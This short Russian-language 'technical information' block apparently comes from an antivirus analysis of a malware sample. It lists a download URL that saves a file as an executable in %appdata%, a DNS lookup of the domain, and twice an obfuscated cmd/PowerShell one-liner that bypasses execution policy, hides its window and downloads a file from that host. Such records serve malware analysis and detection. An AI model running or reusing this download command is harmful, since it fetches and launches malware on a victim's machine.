Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^wEr^s^He^LL.Exe -^ExEcUtiONp^O^liCY^ ^byp^aS^S ^-n^o^Pr^ofilE -^windo^w^stYle ^hid^deN (^N^Ew^-^objEC^T^ S^yStem.^Net.we^BcLI^en^t^).d^own^l^Oa^dFI^L^E('http://www.zoerpoled.t...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "p^O^wEr^s^He^LL.Exe -^ExEcUtiONp^O^liCY^ ^byp^aS^S ^-n^o^Pr^ofilE -^windo^w^stYle ^hid^deN (^N^Ew^-^objEC^T^ S^yStem.^Net.we^BcLI^en^t^).d^own^l^Oa^dFI^L^E('http://www.zoerpoled.t...' (со скрытым окном)